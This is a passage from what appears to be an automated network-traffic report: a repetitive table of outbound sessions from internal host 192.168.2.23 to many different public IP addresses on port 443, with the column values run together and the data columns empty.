                                                14154192.168.2.23431464.5.16.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14155192.168.2.2356308188.165.120.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14156192.168.2.2345946218.175.115.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14157192.168.2.2359754139.4.11.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14158192.168.2.2341168146.241.127.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14159192.168.2.2336292151.80.71.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14160192.168.2.2343626216.243.170.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14161192.168.2.233415042.61.40.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14162192.168.2.2360300102.242.164.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14163192.168.2.233337424.132.185.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14164192.168.2.235912249.183.240.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14165192.168.2.2343412124.150.224.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14166192.168.2.235806023.159.179.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14167192.168.2.234969835.74.15.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14168192.168.2.2340108167.229.100.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14169192.168.2.235179046.62.111.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14170192.168.2.235670264.86.186.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14171192.168.2.235084418.98.75.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14172192.168.2.235701417.31.111.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14173192.168.2.233806687.82.93.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14174192.168.2.2343436164.176.255.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14175192.168.2.233627281.249.243.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14176192.168.2.2359954141.249.220.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14177192.168.2.2349058186.194.134.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14178192.168.2.235969286.36.118.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14179192.168.2.235514813.9.126.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14180192.168.2.235385073.66.75.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14181192.168.2.235401889.199.197.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14182192.168.2.235119094.149.47.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14183192.168.2.233634462.193.136.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14184192.168.2.23582581.193.114.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14185192.168.2.2357214204.54.213.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14186192.168.2.235213257.113.213.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14187192.168.2.2337274141.140.154.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14188192.168.2.235874483.9.134.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14189192.168.2.233652283.20.250.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14190192.168.2.234015897.229.168.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14191192.168.2.233440220.27.77.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14192192.168.2.235003065.47.188.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14193192.168.2.234612882.37.16.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14194192.168.2.2333622208.108.7.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14195192.168.2.2339456199.229.129.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14196192.168.2.2337844101.48.219.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14197192.168.2.234062076.248.203.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14198192.168.2.235799274.168.144.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14199192.168.2.2333004133.154.55.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14200192.168.2.233506072.33.61.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14201192.168.2.2341766223.80.196.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14202192.168.2.233337078.15.65.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14203192.168.2.2357546181.9.162.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14204192.168.2.2345734122.118.197.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14205192.168.2.2355456183.37.228.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14206192.168.2.2335594158.74.230.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14207192.168.2.234851090.242.146.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14208192.168.2.2359460199.206.135.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14209192.168.2.2335638141.143.183.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14210192.168.2.23592565.12.11.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14211192.168.2.2334102106.168.107.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14212192.168.2.234973495.127.193.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14213192.168.2.235099020.155.61.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14214192.168.2.2335410153.94.148.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14215192.168.2.2340656195.13.89.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14216192.168.2.2340480123.150.155.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14217192.168.2.2342712219.150.201.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14218192.168.2.2341858177.243.88.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14219192.168.2.233442651.53.53.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14220192.168.2.234272495.37.219.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14221192.168.2.2348266171.14.94.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14222192.168.2.233321246.138.66.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14223192.168.2.2341810159.172.124.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14224192.168.2.235999291.108.180.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14225192.168.2.2337462102.47.107.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14226192.168.2.235171258.161.63.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14227192.168.2.2359072158.145.133.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14228192.168.2.233632641.79.136.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14229192.168.2.233424077.232.15.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14230192.168.2.2346504155.107.216.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14231192.168.2.234438697.55.86.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14232192.168.2.2339090190.145.9.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14233192.168.2.2347634198.206.198.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14234192.168.2.2337192101.26.40.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14235192.168.2.233848886.22.56.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14236192.168.2.233320883.246.123.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14237192.168.2.233381014.127.14.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14238192.168.2.2358992105.2.226.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14239192.168.2.233837065.108.4.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14240192.168.2.2351090138.163.5.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14241192.168.2.2349480148.123.73.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14242192.168.2.2336762211.224.121.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14243192.168.2.234879285.60.178.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14244192.168.2.23505621.235.177.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14245192.168.2.234689837.103.5.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14246192.168.2.233553212.57.7.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14247192.168.2.233494861.225.243.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14248192.168.2.2334734182.205.202.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14249192.168.2.2332880212.214.173.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14250192.168.2.2339254134.74.226.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14251192.168.2.2355362108.54.165.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14252192.168.2.235125835.129.249.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14253192.168.2.235173437.60.206.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14254192.168.2.2356116100.224.104.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14255192.168.2.23572065.102.95.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14256192.168.2.2348378180.144.248.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14257192.168.2.2340316197.167.128.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14258192.168.2.235397837.121.177.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14259192.168.2.233641644.214.61.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14260192.168.2.2338084156.231.152.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14261192.168.2.2355484133.118.201.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14262192.168.2.235216842.238.217.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14263192.168.2.2358620184.69.231.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14264192.168.2.2352248191.125.156.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14265192.168.2.2356986116.92.130.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14266192.168.2.2346310100.159.6.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14267192.168.2.2355470158.84.30.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14268192.168.2.234761068.125.31.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14269192.168.2.2351810217.160.88.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14270192.168.2.2343936145.10.187.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14271192.168.2.233508044.115.217.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14272192.168.2.233497262.179.143.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14273192.168.2.234965060.95.18.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14274192.168.2.2341202122.35.33.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14275192.168.2.2360734185.132.225.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14276192.168.2.235167649.23.9.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14277192.168.2.2343802119.13.33.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14278192.168.2.235287482.144.177.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14279192.168.2.2350104217.34.27.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14280192.168.2.2335040207.107.18.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14281192.168.2.2343244193.175.77.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14282192.168.2.235041838.25.32.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14283192.168.2.2357242165.84.32.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14284192.168.2.233436278.152.141.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14285192.168.2.2356346128.160.111.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14286192.168.2.235302849.56.223.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14287192.168.2.23366105.160.109.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14288192.168.2.2333996168.35.153.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14289192.168.2.234375213.204.45.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14290192.168.2.235853698.251.242.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14291192.168.2.2342208169.78.239.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14292192.168.2.2335948143.120.247.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14293192.168.2.234192291.236.209.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14294192.168.2.235129439.218.43.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14295192.168.2.2358490102.138.67.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14296192.168.2.2338224195.133.86.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14297192.168.2.2343494177.131.106.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14298192.168.2.2338942122.43.121.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14299192.168.2.2355970172.112.146.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14300192.168.2.2354586182.253.166.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14301192.168.2.2356692210.234.152.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14302192.168.2.2358350160.73.193.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14303192.168.2.233496486.116.43.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14304192.168.2.2333924120.34.81.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14305192.168.2.234268680.131.198.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14306192.168.2.2358342212.226.159.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14307192.168.2.2352084125.250.82.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14308192.168.2.234327418.88.242.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14309192.168.2.2348838148.77.38.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14310192.168.2.235815059.246.114.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14311192.168.2.2335138126.214.178.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14312192.168.2.2347512209.60.88.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14313192.168.2.2342764169.185.115.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14314192.168.2.233464418.92.45.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14315192.168.2.234615867.249.79.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14316192.168.2.2354296207.245.140.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14317192.168.2.2334758105.187.118.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14318192.168.2.233419688.70.100.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14319192.168.2.2353924132.5.225.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14320192.168.2.234887044.118.205.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14321192.168.2.235900472.56.159.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14322192.168.2.233549444.155.198.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14323192.168.2.2353280211.219.178.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14324192.168.2.234417893.119.170.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14325192.168.2.234780453.117.19.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14326192.168.2.2335132194.215.7.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14327192.168.2.2332906143.114.11.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14328192.168.2.234207079.248.14.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14329192.168.2.2350260190.202.165.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14330192.168.2.233799483.231.244.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14331192.168.2.2352942171.201.136.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14332192.168.2.2355364134.174.72.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14333192.168.2.2347350204.211.221.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14334192.168.2.2351904109.136.81.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14335192.168.2.235773625.64.246.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14336192.168.2.236033895.95.133.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14337192.168.2.235230490.97.142.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14338192.168.2.235091243.132.222.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14339192.168.2.2341060106.8.114.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14340192.168.2.2346644197.11.157.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14341192.168.2.2351202208.250.135.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14342192.168.2.234420293.168.45.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14343192.168.2.2351560167.91.35.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14344192.168.2.2336408141.45.118.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14345192.168.2.2341768134.29.120.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14346192.168.2.235803250.206.242.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14347192.168.2.234829249.184.159.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14348192.168.2.235168041.98.24.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14349192.168.2.234342891.30.51.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14350192.168.2.233497284.72.213.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14351192.168.2.235353243.18.167.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14352192.168.2.2348328159.205.198.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14353192.168.2.2352268152.198.221.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14354192.168.2.2348312197.23.214.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14355192.168.2.2351254157.24.85.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14356192.168.2.2337466101.103.141.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14357192.168.2.234353267.48.10.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14358192.168.2.235826860.46.37.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14359192.168.2.2356526186.136.114.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14360192.168.2.236076048.49.11.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14361192.168.2.2343406184.45.41.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14362192.168.2.235141297.170.175.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14363192.168.2.235491691.62.204.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14364192.168.2.234150895.251.121.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14365192.168.2.233457075.188.120.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14366192.168.2.2339074132.58.143.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14367192.168.2.234583692.203.171.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14368192.168.2.2345018156.38.243.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14369192.168.2.2349092185.16.202.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14370192.168.2.234107688.245.220.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14371192.168.2.2350274181.231.198.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14372192.168.2.234378069.233.53.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14373192.168.2.234198689.183.135.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14374192.168.2.235307467.107.28.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14375192.168.2.235454688.206.8.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
